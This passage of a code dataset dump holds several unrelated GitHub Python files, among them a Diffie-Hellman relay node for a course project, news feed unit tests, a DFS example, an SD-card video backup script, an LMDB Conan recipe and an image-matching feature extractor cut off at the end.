initiate_DH_offline_connection(node_1_public_dh):\n #TODO: perform ssl and get shared key\n offline_socket = Modified_SSL_Handshake.connect_to_node(5433)\n\n # send online DH\n offline_socket.sendall(Functions.wrap_to_send(node_1_public_dh))\n\n node_3_dh = Functions.read_message_with_delimiter(offline_socket)\n offline_socket.close()\n return node_3_dh\n\n\ndef handle_DH_2_online_connection(node_2_public_dh):\n print(\"opening online connection...\")\n online_socket = Modified_SSL_Handshake.handle_node_connection(5432)\n\n # receive n-1\n receive_verify_online_n(online_socket)\n\n # send offline DH\n online_socket.sendall(Functions.wrap_to_send(node_2_public_dh))\n print(\"[Middle Node] sent DH\")\n\n send_n(online_socket)\n time.sleep(2)\n send_next_time(online_socket)\n\n online_socket.close()\n\n\ndef transfer_data(data):\n offline_socket = Modified_SSL_Handshake.connect_to_node(5433)\n print(\"connected to offline node\")\n offline_socket.send(Functions.wrap_to_send(data))\n print(\"sent\")\n offline_socket.close()\n\n\ndef receive_transfer_data():\n online_socket = Modified_SSL_Handshake.handle_node_connection(5432)\n\n receive_verify_online_n(online_socket)\n data_to_transfer = Functions.read_message_with_delimiter(online_socket)\n\n send_n(online_socket)\n time.sleep(2)\n send_next_time(online_socket)\n print(\"[Middle Node] Received data\")\n online_socket.close()\n return data_to_transfer\n\n\ndef main():\n online_dh_value = handle_DH_1_online_connection()\n print(\"[Middle Node] Received online dh part\")\n offline_dh_value = initiate_DH_offline_connection(online_dh_value)\n print(\"[Middle Node] Received offline dh part\")\n time.sleep(next_time-2)\n handle_DH_2_online_connection(offline_dh_value)\n print(\"[Middle Node] Transferring data...\")\n\n # runs 10 times to simulate real world use\n for i in range(1, 10):\n print(\"sleeping...\", next_time)\n time.sleep(next_time - 2)\n print(\"sending data to transfer\")\n data_to_transfer = receive_transfer_data()\n print(\"transfering data...\")\n transfer_data(data_to_transfer)\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"ray836/Final-Project-CS5490","sub_path":"Middle_Node.py","file_name":"Middle_Node.py","file_ext":"py","file_size_in_byte":5246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32571828928","text":"\n\n# write to a file\nwith open('fruit.txt', 'w') as f:\n f.write('apple\\nbanana\\ncherry\\n')\n# this will overwrite the file\n\n# append to a file without overwriting\nwith open('fruit.txt', 'a') as f:\n f.write('\\npear\\n')\n\n# read and write to a file\nwith open('fruit.txt', 'a+') as myfile:\n myfile.write('\\norange')\n myfile.seek(0)\n content = myfile.read()\n\nprint(content)\n\n\nwith open(\"vegetables.txt\", \"a\") as f:\n f.write(\"broccoli\\n\")\n# this will look for existing file, and create it if not exists\n","repo_name":"mayfiete/python_mega_course","sub_path":"writing_text_to_file.py","file_name":"writing_text_to_file.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23409323156","text":"import unittest\nfrom datetime import datetime\n\nfrom zope.component import queryMultiAdapter\nfrom zope.interface.verify import verifyObject\nfrom Products.Silva.testing import TestRequest, Transaction\n\nfrom silva.app.news.interfaces import INewsItem, IAgendaItem\nfrom silva.app.news.datetimeutils import local_timezone\nfrom silva.app.news.tests.SilvaNewsTestCase import SilvaNewsTestCase\nfrom silva.core.interfaces import IFeedEntry\n\nfrom dateutil.relativedelta import relativedelta\n\n\nclass TestFeeds(SilvaNewsTestCase):\n \"\"\" Test atom and rss feeds\n \"\"\"\n\n def setUp(self):\n with Transaction():\n super(TestFeeds, self).setUp()\n # Publication\n factory = self.root.manage_addProduct['silva.app.news']\n factory.manage_addNewsPublication('source', 'Publication')\n factory.manage_addNewsFilter('filter', 'Filter')\n factory.manage_addNewsViewer('viewer', 'Viewer')\n\n self.root.filter.set_show_agenda_items(True)\n self.root.filter.add_source(self.root.source)\n self.root.viewer.add_filter(self.root.filter)\n self.root.viewer.set_hide_expired_events(False)\n\n # Items\n self.add_published_news_item(\n self.root.source, 'raining', 'The rain is coming')\n self.add_published_news_item(\n self.root.source, 'cows', 'Cows are moving in town')\n start_event = datetime(2010, 10, 9, 8, 20, 00, tzinfo=local_timezone)\n end_event = start_event + relativedelta(hours=+2)\n self.add_published_agenda_item(\n self.root.source, 'war', 'This is War', start_event, end_event)\n\n def test_feeds_agenda_item(self):\n entry = queryMultiAdapter(\n (self.root.source.war, TestRequest()),\n IFeedEntry)\n self.assertTrue(verifyObject(IAgendaItem, self.root.source.war))\n self.assertTrue(verifyObject(IFeedEntry, entry))\n self.assertEqual(entry.id(), 'http://localhost/root/source/war')\n self.assertEqual(entry.title(), 'This is War')\n self.assertEqual(entry.url(), 'http://localhost/root/source/war')\n self.assertEqual(entry.authors(), ['manager'])\n self.assertEqual(entry.description(), '')\n self.assertEqual(entry.keywords(), [])\n self.assertEqual(entry.html_description(), \"

      \")\n self.assertEqual(entry.location(), '')\n self.assertEqual(entry.start_datetime(), '2010-10-09T08:20:00+02:00')\n self.assertEqual(entry.end_datetime(), '2010-10-09T10:20:00+02:00')\n\n def test_feeds_news_item(self):\n entry = queryMultiAdapter(\n (self.root.source.cows, TestRequest()),\n IFeedEntry)\n self.assertTrue(verifyObject(INewsItem, self.root.source.cows))\n self.assertTrue(verifyObject(IFeedEntry, entry))\n self.assertEqual(entry.id(), 'http://localhost/root/source/cows')\n self.assertEqual(entry.title(), 'Cows are moving in town')\n self.assertEqual(entry.url(), 'http://localhost/root/source/cows')\n self.assertEqual(entry.authors(), ['manager'])\n self.assertEqual(entry.description(), '')\n self.assertEqual(entry.keywords(), [])\n self.assertEqual(entry.html_description(), \"

      \")\n\n def test_functional_rss_feed_from_viewer(self):\n \"\"\"Test that you can get a rss feeds from a news viewer.\n \"\"\"\n with self.layer.get_browser() as browser:\n self.assertEqual(\n browser.open('http://localhost/root/viewer/rss.xml'),\n 200)\n self.assertEqual(\n browser.content_type,\n 'text/xml;charset=UTF-8')\n\n items = browser.xml.xpath(\n '//rss:item', namespaces={'rss': \"http://purl.org/rss/1.0/\"})\n # We have two news items, and one agenda item.\n self.assertEquals(3, len(items))\n\n def test_functional_atom_feed_from_viewer(self):\n \"\"\"Test that you can get an atom from a news viewer.\n \"\"\"\n with self.layer.get_browser() as browser:\n self.assertEqual(\n browser.open('http://localhost/root/viewer/atom.xml'),\n 200)\n self.assertEqual(\n browser.content_type,\n 'text/xml;charset=UTF-8')\n\n items = browser.xml.xpath(\n '//atom:entry', namespaces={'atom': \"http://www.w3.org/2005/Atom\"})\n # We have two news items, and one agenda item.\n self.assertEquals(3, len(items))\n\n def test_functional_rss_feed_from_publication(self):\n \"\"\"Test that you can get a rss feeds from a default news publication.\n \"\"\"\n with self.layer.get_browser() as browser:\n # Feeds are disabled by default (container settings)\n self.assertEqual(\n browser.open('http://localhost/root/source/rss.xml'),\n 404)\n # If you enable them when they should work\n self.root.source.set_allow_feeds(True)\n self.assertEqual(\n browser.open('http://localhost/root/source/rss.xml'),\n 200)\n self.assertEqual(\n browser.content_type,\n 'text/xml;charset=UTF-8')\n\n items = browser.xml.xpath(\n '//rss:item', namespaces={'rss': \"http://purl.org/rss/1.0/\"})\n # We only have two items, since the feed is only enabled\n # for news and not agenda items\n self.assertEquals(2, len(items))\n\n def test_functional_atom_feed_from_publication(self):\n \"\"\"Test that you can get an atom from a default news publication.\n \"\"\"\n with self.layer.get_browser() as browser:\n self.assertEqual(\n browser.open('http://localhost/root/source/atom.xml'),\n 404)\n # If you enable them when they should work\n self.root.source.set_allow_feeds(True)\n self.assertEqual(\n browser.open('http://localhost/root/source/atom.xml'),\n 200)\n self.assertEqual(\n browser.content_type,\n 'text/xml;charset=UTF-8')\n\n items = browser.xml.xpath(\n '//atom:entry', namespaces={'atom': \"http://www.w3.org/2005/Atom\"})\n # We only have two items, since the feed is only enabled\n # for news and not agenda items\n self.assertEquals(2, len(items))\n\n\ndef test_suite():\n suite = unittest.TestSuite()\n suite.addTest(unittest.makeSuite(TestFeeds))\n return suite\n","repo_name":"silvacms/silva.app.news","sub_path":"src/silva/app/news/tests/test_feeds.py","file_name":"test_feeds.py","file_ext":"py","file_size_in_byte":6608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33305725557","text":"graph_or_tree = {\r\n\"A\" :[\"B\",\"C\"],\r\n\"B\" :[\"D\",\"E\"],\r\n\"C\" :[\"B\",\"F\"],\r\n\"D\": [],\r\n\"E\" : [\"F\"],\r\n\"F\" :[],\r\n\"G\" :[\"B\",\"A\",\"L\",\"A\",\"J\",\"I\"]\r\n}\r\nprint(graph_or_tree[\"G\"])\r\nvisited_path=[]\r\nparent ={}\r\ndfs_path=[]\r\nfor node in graph_or_tree.keys() :\r\n parent[node] =None\r\ndef DFS(node):\r\n visited_path.append(node)\r\n dfs_path.append(node)\r\n\r\n for i in graph_or_tree[node]:\r\n if i not in visited_path:\r\n parent[i] = node\r\n DFS(i)\r\n \r\nDFS(\"A\")\r\nprint(\"The graph = \",graph_or_tree)\r\nprint(\"=============Depth First Search Algorithm===========\")\r\nprint(\"traversal path of depth first search =\\t\",*dfs_path,sep = \" -> \")\r\n\r\n\r\n","repo_name":"thebrokencoder-code/python-dfs","sub_path":"dfs.py","file_name":"dfs.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"45752086553","text":"import os\nimport shutil\nimport datetime\nimport msvcrt\nimport psutil\nimport locale\nimport pyperclip\nfrom tqdm import tqdm\n\nlocale.setlocale(locale.LC_TIME, 'pt_BR.UTF-8')\n\ndef copy_files(source, destination):\n total_files = 0\n total_size = 0\n\n # Percorre todos os arquivos e diretórios de origem\n for item in source:\n if os.path.isfile(item):\n total_files += 1\n total_size += os.path.getsize(item)\n elif os.path.isdir(item):\n for root, _, filenames in os.walk(item):\n for filename in filenames:\n file_path = os.path.join(root, filename)\n total_files += 1\n total_size += os.path.getsize(file_path)\n\n print(f\"Total de arquivos a copiar: {total_files}\")\n print(f\"Tamanho total: {total_size} bytes\")\n print(\"Copiando arquivos:\")\n\n # Copia os arquivos e diretórios de origem para o destino\n with tqdm(total=total_size, unit='B', unit_scale=True, ncols=80) as progress_bar:\n for item in source:\n if os.path.isfile(item):\n shutil.copy(item, destination)\n progress_bar.update(os.path.getsize(item))\n elif os.path.isdir(item):\n for root, _, filenames in os.walk(item):\n for filename in filenames:\n file_path = os.path.join(root, filename)\n shutil.copy(file_path, destination)\n progress_bar.update(os.path.getsize(file_path))\n\n print(\"Copying files: Done\")\n print(\"\")\n\ndef rename_files(folder_path):\n files = os.listdir(folder_path)\n for file in files:\n if file.endswith(\".LRV\"):\n new_name = os.path.splitext(file)[0] + \".MP4\"\n os.rename(os.path.join(folder_path, file), os.path.join(folder_path, new_name))\n\ndef create_folder_structure(date, guide_name, tour_name, base_path):\n year_folder = os.path.join(base_path, date.strftime(\"%Y\"))\n month_number = date.strftime('%m')\n month_name = date.strftime('%B').upper()\n folder_name = f\"{date.day} DE {month_name} {date.year} - {tour_name.upper()} - {guide_name.upper()}\"\n folder_path = os.path.join(year_folder, f\"{month_number}. {month_name}\", folder_name)\n os.makedirs(folder_path, exist_ok=True)\n footage_path = os.path.join(folder_path, \"Footage\")\n proxy_path = os.path.join(folder_path, \"Proxy Media\")\n os.makedirs(footage_path, exist_ok=True)\n os.makedirs(proxy_path, exist_ok=True)\n return folder_path, footage_path, proxy_path\n\ndef write_message_file(date, tour_name, folder_path):\n formatted_date = date.strftime(\"%d de %B de %Y\").lstrip(\"0\").upper()\n message = f\"*Litoral Vídeos* 📹🏖☀😎\\n\\nOlá!\\n\\nSegue, o link do YouTube com a filmagem do seu passeio de *{tour_name}* do dia *{formatted_date}*:\\n\\n[LINK DO VÍDEO]\\n\\nAqui também vai um link com as imagens aéreas do Ceará que separamos para vocês:\\n\\nhttps://youtu.be/4C7cDVfsGf4\\n\\nObrigado pela sua visita e aproveite a filmagem!\\n\\nQualquer dúvida estamos à disposição.\"\n file_path = os.path.join(folder_path, \"message.txt\")\n with open(file_path, \"w\", encoding='utf-8') as file:\n file.write(message)\n\ndef format_participants_text(pasted_text):\n \n participants = []\n lines = pasted_text.split(\"[\")\n for line in lines:\n if line.strip():\n name = line.split(\":\")[-1].strip()\n participants.append(name.title())\n return participants\n\ndef write_participants_file(participants, folder_path):\n file_path = os.path.join(folder_path, \"participants.txt\")\n with open(file_path, \"w\") as file:\n for participant in participants:\n file.write(participant + \"\\n\")\n\ndef get_sd_card_path():\n drives = psutil.disk_partitions(all=True)\n for drive in drives:\n if drive.fstype.lower() == 'fat32' or drive.fstype.lower() == 'fat':\n return drive.mountpoint\n raise ValueError(\"Nenhum cartão SD detectado\")\n\ndef get_files_to_copy(sd_card_path):\n files_to_copy = []\n for root, _, filenames in os.walk(sd_card_path):\n for filename in filenames:\n file_path = os.path.join(root, filename)\n files_to_copy.append(file_path)\n return files_to_copy\n\ndef get_user_input():\n print(\"De que dia é a filmagem?\")\n print(\"\")\n\n print(\"1) Hoje\")\n print(\"2) Ontem\")\n print(\"3) Especificar data (Formato: DD/MM/AAAA)\")\n print(\"\")\n\n option = int(input(\"Opção: \"))\n if option == 1:\n date = datetime.date.today()\n elif option == 2:\n date = datetime.date.today() - datetime.timedelta(days=1)\n elif option == 3:\n print(\"\")\n date_str = input(\"Digite a data (DD/MM/AAAA): \")\n date = datetime.datetime.strptime(date_str, \"%d/%m/%Y\").date()\n else:\n raise ValueError(\"Opção inválida\")\n os.system(\"cls\")\n\n guide_name = input(\"Nome do guia? \")\n os.system(\"cls\")\n\n print(\"Qual passeio?\")\n print(\"\")\n\n print(\"1) Morro Branco\")\n print(\"2) Lagoinha\")\n print(\"3) Canoa Quebrada\")\n print(\"4) Outro\")\n print(\"\")\n\n tour_option = int(input(\"Opção: \"))\n if tour_option == 1:\n tour_name = \"Morro Branco\"\n elif tour_option == 2:\n tour_name = \"Lagoinha\"\n elif tour_option == 3:\n tour_name = \"Canoa Quebrada\"\n elif tour_option == 4:\n tour_name = input(\"Digite o nome do passeio: \")\n else:\n raise ValueError(\"Opção inválida\")\n os.system(\"cls\")\n\n print(\"Cole o texto com os participantes e pressione Enter quando terminar:\")\n participants_text = \"\"\n while True:\n line = input()\n if line.lower() == \"sair\" or line == \"\":\n break\n participants_text += line + \"\\n\"\n\n participants = format_participants_text(participants_text)\n\n formatted_date = date.strftime(\"%d de %B de %Y\").lstrip(\"0\").upper()\n tour_name = tour_name.upper()\n guide_name = guide_name.upper()\n\n clipboard_text = f\"{formatted_date} - {tour_name} - {guide_name}\"\n pyperclip.copy(clipboard_text)\n\n return date, guide_name, tour_name, participants\n\ndef wait_for_keypress():\n print(\"\\nProcesso finalizado com sucesso. Aperte qualquer tecla para encerrar...\")\n msvcrt.getch()\n\ntry:\n # Get SD card path\n sd_card_path = get_sd_card_path()\n print(f\"Cartão SD detectado em: {sd_card_path}\")\n print(\"\")\n\n # Get user input\n date, guide_name, tour_name, participants = get_user_input()\n\n # Copy files from SD card\n files_to_copy = get_files_to_copy(sd_card_path)\n destination_folder = f\"bkp-{datetime.datetime.now().strftime('%Y%m%d%H%M%S')}\"\n destination_path = os.path.join(\"D:\\\\\", destination_folder)\n os.makedirs(destination_path, exist_ok=True)\n print(\"INICIANDO BACKUP DO CARTÃO:\")\n print(\"\")\n\n copy_files(files_to_copy, destination_path)\n\n # Create folder structure\n base_path = r\"D:\\ARQUIVO\"\n folder_path, footage_path, proxy_path = create_folder_structure(date, guide_name, tour_name, base_path)\n\n # Copy files\n print(\"INICIANDO CÓPIA DOS ARQUIVOS BRUTO:\")\n print(\"\")\n\n copy_files([os.path.join(destination_path, file) for file in files_to_copy if file.endswith(\".MP4\")], footage_path)\n\n print(\"INICIANDO CÓPIA DOS ARQUIVOS DE MÍDIAS PROXY:\")\n print(\"\")\n copy_files([os.path.join(destination_path, file) for file in files_to_copy if file.endswith(\".LRV\")], proxy_path)\n\n # Rename files in Proxy Media folder\n rename_files(proxy_path)\n\n # Write message file\n write_message_file(date, tour_name, folder_path)\n\n # Write participants file\n write_participants_file(participants, folder_path)\n\n # Wait for keypress to exit\n wait_for_keypress()\n\n os.startfile(folder_path)\n\nexcept ValueError as e:\n print(f\"Erro: {str(e)}\")\nexcept Exception as e:\n print(f\"Ocorreu um erro durante a execução do script: {str(e)}\")\n wait_for_keypress()\n","repo_name":"EriJohnson/litoral_videos_backup_sd_card","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72543534593","text":"from conans import ConanFile, CMake, tools\nimport sys, os\n\ndef option_on_off(option):\n return \"ON\" if option else \"OFF\"\n\nclass LMDBConan(ConanFile):\n name = \"lmdb\"\n version = \"0.9.24\"\n settings = \"os\", \"compiler\", \"build_type\", \"arch\"\n url = \"https://github.com/k-nuth/conan-lmdb\"\n license = \"OpenLDAP Public License\"\n\n generators = \"cmake\"\n\n options = {\"shared\": [True, False],\n \"fPIC\": [True, False],\n \"verbose\": [True, False],\n }\n\n default_options = \"shared=False\", \\\n \"fPIC=True\", \\\n \"verbose=False\"\n\n # exports = \"conanfile.py\", \"mdb.def\", \"win32/*\", \"LICENSE.md\" # \"CMakeLists.txt\",\n exports_sources = [\"CMakeLists.txt\"]\n build_policy = \"missing\"\n\n @property\n def msvc_mt_build(self):\n return \"MT\" in str(self.settings.get_safe(\"compiler.runtime\"))\n\n @property\n def fPIC_enabled(self):\n if self.settings.compiler == \"Visual Studio\":\n return False\n else:\n return self.options.fPIC\n\n @property\n def is_shared(self):\n if self.options.shared and self.msvc_mt_build:\n return False\n else:\n return self.options.shared\n\n\n def config_options(self):\n if self.settings.compiler == \"Visual Studio\":\n self.options.remove(\"fPIC\")\n if self.options.shared and self.msvc_mt_build:\n self.options.remove(\"shared\")\n\n def configure(self):\n del self.settings.compiler.libcxx #Pure-C \n\n def package_id(self):\n self.info.options.verbose = \"ANY\"\n\n def source(self):\n # extension = \"zip\" if sys.platform == \"win32\" else \"tar.gz\" % self.folder_name\n extension = \"zip\" if sys.platform == \"win32\" else \"tar.gz\" #% self.build_folder\n \n base_name = \"LMDB_%s\" % (self.version)\n zip_name = \"%s.%s\" % (base_name, extension)\n url = \"https://github.com/LMDB/lmdb/archive/%s\" % (zip_name)\n self.output.info(\"Downloading %s...\" % url)\n tools.download(url, zip_name)\n tools.unzip(zip_name, \".\")\n os.unlink(zip_name)\n os.rename(\"lmdb-%s\" % base_name, \"lmdb\")\n\n def build(self):\n # cmake = CMake(self.settings)\n # shared = \"-DBUILD_SHARED_LIBS=1\" if self.options.shared else \"\"\n # self.run('cmake %s %s %s' % (self.conanfile_directory, cmake.command_line, shared))\n # self.run(\"cmake --build . %s\" % cmake.build_config)\n\n cmake = CMake(self)\n cmake.verbose = self.options.verbose\n\n cmake.definitions[\"ENABLE_SHARED\"] = option_on_off(self.is_shared)\n cmake.definitions[\"ENABLE_POSITION_INDEPENDENT_CODE\"] = option_on_off(self.fPIC_enabled)\n\n\n cmake.configure(source_dir=self.source_folder)\n cmake.build()\n\n def package(self):\n self.copy(\"lmdb.h\", dst=\"include\", src=\"lmdb/libraries/liblmdb\")\n self.copy(\"*.lib\", dst=\"lib\", src=\"lib\", keep_path=True)\n self.copy(\"*.a\", dst=\"lib\", src=\"lib\", keep_path=True)\n self.copy(\"*.pdb\", dst=\"lib\", src=\"lib\", keep_path=True)\n self.copy(\"*.dll\", dst=\"bin\", src=\"lib\", keep_path=True)\n self.copy(\"*.so\", dst=\"bin\", src=\"lib\", keep_path=True)\n self.copy(\"*.exe\", dst=\"bin\", src=\"bin\", keep_path=True)\n\n def package_info(self):\n if self.settings.build_type == \"Debug\":\n self.cpp_info.libs = [\"lmdbd\"]\n else:\n self.cpp_info.libs = [\"lmdb\"]\n \n if self.settings.os == \"Windows\":\n self.cpp_info.libs.append(\"ntdll\")\n else:\n self.cpp_info.libs.append(\"pthread\")\n","repo_name":"k-nuth/conan-lmdb","sub_path":"conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":3624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26025461074","text":"from quafing.multipdf import multipdf_init\nfrom quafing.multipdf.multipdf_collection import MultiPdfCollection\n\ndef create_multi_pdf(mdpdfType, data,colmetadata,calculate=True,*args,**kwargs):\n\t\"\"\"\n\tcreate a multipdf object from data and (column)metadata\n\n\t:param mdpdfType: str; Type of multidimensional pdf to create. See quafing.multipdf.__init__() for valid types\n\t:param data: pandas DataFrame; (columnar) data from whhih to create multipdf. \n\t:param colmetadta: array of dictionaries; metadata for each column\n\t:param calculate: bool; keyword to trigger calculation of (component) pdfs for created multipdf object. default True\n\t:param args: optional; arguments to be passed to multi_pdf class calculate_pdf() function\n\t:param kwargs: optional; keyword arguments to be passed to multi_pdf class calculate_pdf() function\n\t:return mdpdf: MultiDimensionalPdf object of specified type \n\t\"\"\"\n\tmdpdf = multipdf_init(mdpdfType)\n\tmdpdf._import_data(data,colmetadata)\n\tmdpdf._basic_validation()\n\tif calculate:\n\t mdpdf.calculate_pdf(*args,**kwargs) \n\treturn mdpdf\n\n\ndef create_mdpdf_collection(mdpdfType, group_data, group_labels,colmetadata, calculate=True, validate_metadata=False, *args, **kwargs):\n \"\"\"\n Create a multi-dimesional pdf ccolletion object from groups of data.\n\n :param mdpdfType: str; Type of multidimensional pdfs to create. See quafing.multipdf.__init__() for valid types\n :param group_data: list of pandas DDataFrames with the data for grouos of respondents\n :param group_labels: list of labels associated with the groups\n :param colmetadata: column metadata of the data/questions of ech group\n :param calculate: bool (default True). If True calculate denssity estimates for all groups\n :param validate_metaata: bool (default False). If true peform extended validation of metadata conformity between groups\n :param args: optional positional arguments to pass to create_multi_pdf() method \n :param kwargs: optional keyword arguments to pass to create_multi_pdf() method\n :return mpdf_collection: collection of multi-dimensional pdfs (type MultiPdfCollection)\n \n \"\"\"\n mdpdfs = []\n for i, data in enumerate(group_data):\n mdpdf = create_multi_pdf(mdpdfType,data, colmetadata, calculate=calculate, *args, **kwargs)\n mdpdfs.append(mdpdf)\n mdpdf_collection = MultiPdfCollection(mdpdfs,group_labels, colmetadata, mdpdfType, validate_metadata=validate_metadata)\n return mdpdf_collection","repo_name":"SDCCA/quafing","sub_path":"quafing/multipdf/multipdf.py","file_name":"multipdf.py","file_ext":"py","file_size_in_byte":2464,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"11513214976","text":"#Ler o nome, idade e sexo de 4 pessoas e mostrar no final, a média das idades, o nome do homem mais\r\n#velho e quantas mulheres tem menos de 20 anos\r\n\r\nsomaidades = 0;\r\nconthomem = 0;\r\nmaisvelho = 0;\r\ncontmulhermenoridade = 0;\r\ncontpessoas = 0;\r\n\r\nfor c in range(0, 4):\r\n nome = str(input(f\"Digite o nome da {c+1} pessoa: \")).upper().strip();\r\n idade = int(input(\"Digite a idade dessa pessoa: \"));\r\n sexo = str(input(\"Digite M se a pessoa for mulher e H se for homem: \")).upper();\r\n somaidades = somaidades + idade;\r\n contpessoas = contpessoas + 1;\r\n\r\n if sexo == \"H\": #DESCOBRINDO HOMEM MAIS VELHO\r\n conthomem = conthomem + 1;\r\n if conthomem == 1:\r\n nome_domaisvelho = nome;\r\n maisvelho = idade;\r\n else:\r\n if maisvelho < idade:\r\n maisvelho = idade;\r\n nome_domaisvelho = nome;\r\n\r\n if sexo == \"M\": #DESCOBRINDO QUANTIDADES DE MULHERES COM MENOS DE 20\r\n if idade < 20:\r\n contmulhermenoridade = contmulhermenoridade + 1;\r\n\r\nmedia = somaidades / (contpessoas);\r\n\r\nprint(f\"A média das {contpessoas} idades é {media}.\");\r\nprint(f\"O nome do homem mais velho é: {nome_domaisvelho}.\");\r\nprint(f\"E houveram {contmulhermenoridade} mulheres abaixo de 20 anos.\");\r\n\r\n\r\n\r\n\r\n","repo_name":"GabriellyBailon/Cursos","sub_path":"CursoEmVideo/Python/Mundo 2/ex056.py","file_name":"ex056.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7908819478","text":"import pandas as pd\nimport numpy as np\nimport cv2\nfrom context import RAWDATADIR\nfrom helpers import read_before_and_after\n\ndef add_lags(\n df, \n n_lags=3,\n lag_cols = [\n 'Altitude', \n 'Delta', \n 'east_median',\n 'north_median',\n 'east_median_sift', \n 'north_median_sift', \n 'n_matches', \n 'n_matches_sift'\n ]):\n\n Xy = df.copy()\n\n for i in range(1, n_lags + 1):\n lag_feats = df.groupby('sequence')[lag_cols].shift(i)\n leap_feats = df.groupby('sequence')[lag_cols].shift(-i)\n diff_feats = df.groupby('sequence')[lag_cols].diff(i)\n leap_diff_feats = df.groupby('sequence')[lag_cols].diff(-i)\n\n Xy = Xy.join(lag_feats, rsuffix=f'_lag_{i}')\n Xy = Xy.join(leap_feats, rsuffix=f'_leap_{i}')\n \n Xy = Xy.join(diff_feats, rsuffix=f'_diff_{i}')\n Xy = Xy.join(leap_diff_feats, rsuffix=f'_leap_diff_{i}')\n\n return Xy.fillna(0.0)\n\nclass ImageFeatureExtractor:\n def __init__(self, train_dir=RAWDATADIR / 'train/train', test_dir=RAWDATADIR / 'test/test') -> None:\n self.train_dir = train_dir\n self.test_dir = test_dir\n\n self.clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8, 8))\n\n self.shitomasi_params = dict(\n maxCorners = 100,\n qualityLevel = 0.3,\n minDistance = 7,\n blockSize = 7 )\n\n self.lk_params = dict(\n winSize = (15,15),\n maxLevel = 2,\n criteria = (cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 10, 0.03)\n )\n\n self.sift = cv2.SIFT_create()\n\n def _apply_clahe_multichannel(self, img):\n \"\"\"Expects [h, w, c]\"\"\"\n processed = []\n for c_index in range(img.shape[-1]):\n processed.append(self.clahe.apply(img[:, :, c_index]))\n \n return np.dstack(processed)\n\n def _get_lk_features(self, img1, img2, apply_clahe=True):\n gray1 = cv2.cvtColor(img1, cv2.COLOR_BGR2GRAY)\n gray2 = cv2.cvtColor(img2, cv2.COLOR_BGR2GRAY)\n\n if apply_clahe:\n gray1, gray2 = self.clahe.apply(gray1), self.clahe.apply(gray2)\n \n p0 = cv2.goodFeaturesToTrack(gray1, mask = None, **self.shitomasi_params)\n\n if p0 is None:\n return None\n\n # calculate optical flow\n p1, st, err = cv2.calcOpticalFlowPyrLK(gray1, gray2, p0, None, **self.lk_params)\n\n # Select good points\n good_new = p1[st==1]\n good_old = p0[st==1]\n\n if np.sum(st) == 0:\n return None\n\n diffs = []\n centroids = []\n for _, (new, old) in enumerate(zip(good_new, good_old)):\n point1 = old.ravel()\n point2 = new.ravel()\n\n diff = point2 - point1\n\n # Flip for North/East axis alignment with X, Y on image\n diff[0] = - diff[0]\n diffs.append(point2 - point1)\n \n centroid = (point1 + point2) / 2\n centroids.append(centroid)\n\n mean, median, std = np.mean(diffs, axis=0), np.median(diffs, axis=0), np.std(diffs, axis=0)\n c_mean = np.mean(centroids, axis=0)\n \n feats = {\n 'east_mean': mean[0], 'east_median': median[0], 'east_std': std[0],\n 'north_mean': mean[1], 'north_median': median[1], 'north_std': std[1],\n 'centroid_east': 60 - c_mean[0], 'centroid_north': 60 - c_mean[1], 'n_matches': np.sum(st),\n }\n\n return pd.Series(feats)\n\n def _get_sift_features(self, img1, img2):\n \n img1, img2 = self._apply_clahe_multichannel(img1), self._apply_clahe_multichannel(img2)\n \n # find the keypoints and descriptors with SIFT\n kp1, des1 = self.sift.detectAndCompute(img1, None)\n kp2, des2 = self.sift.detectAndCompute(img2, None)\n \n # Check keypoint detection\n if len(kp1) <=1 or len(kp2) <= 1:\n return None\n\n # FLANN parameters\n FLANN_INDEX_KDTREE = 1\n index_params = dict(algorithm = FLANN_INDEX_KDTREE, trees = 5)\n search_params = dict(checks=50) # or pass empty dictionary\n\n flann = cv2.FlannBasedMatcher(index_params, search_params)\n matches = flann.knnMatch(des1,des2,k=2)\n \n # Need to draw only good matches, so create a mask\n matchesMask = [[0,0] for i in range(len(matches))]\n\n # ratio test as per Lowe's paper\n for i, (m,n) in enumerate(matches):\n if m.distance < 0.7 * n.distance:\n matchesMask[i]=[1,0]\n \n # Check match number\n masked_matches = np.asarray(matches)[np.asanyarray(matchesMask) == 1]\n if len(masked_matches) == 0:\n return None\n \n diffs = []\n centroids = []\n pts1 = []\n pts2 = []\n \n for i, m in enumerate(masked_matches):\n point2 = np.asarray(kp2[m.trainIdx].pt)\n point1 = np.asarray(kp1[m.queryIdx].pt)\n \n diff = point2 - point1\n pts1.append(point1)\n pts2.append(point2)\n\n # Flip for North/East axis alignment with X, Y on image\n diff[0] = - diff[0]\n diffs.append(point2 - point1)\n \n centroid = (point1 + point2) / 2\n centroids.append(centroid)\n\n mean, median, std = np.mean(diffs, axis=0), np.median(diffs, axis=0), np.std(diffs, axis=0)\n c_mean = np.mean(centroids, axis=0)\n\n feats = {\n 'east_mean_sift': mean[0], 'east_median_sift': median[0], 'east_std_sift': std[0],\n 'north_mean_sift': mean[1], 'north_median_sift': median[1], 'north_std_sift': std[1],\n 'centroid_east_sift': 60 - c_mean[0], 'centroid_north_sift': 60 - c_mean[1],\n 'n_matches_sift': len(masked_matches), \n }\n\n return pd.Series(feats)\n\n def get_features_from_row(self, row):\n base_dir = self.test_dir if pd.isna(row['North']) else self.train_dir\n \n img1, img2 = read_before_and_after(str(base_dir / row.name))\n\n sift_features = 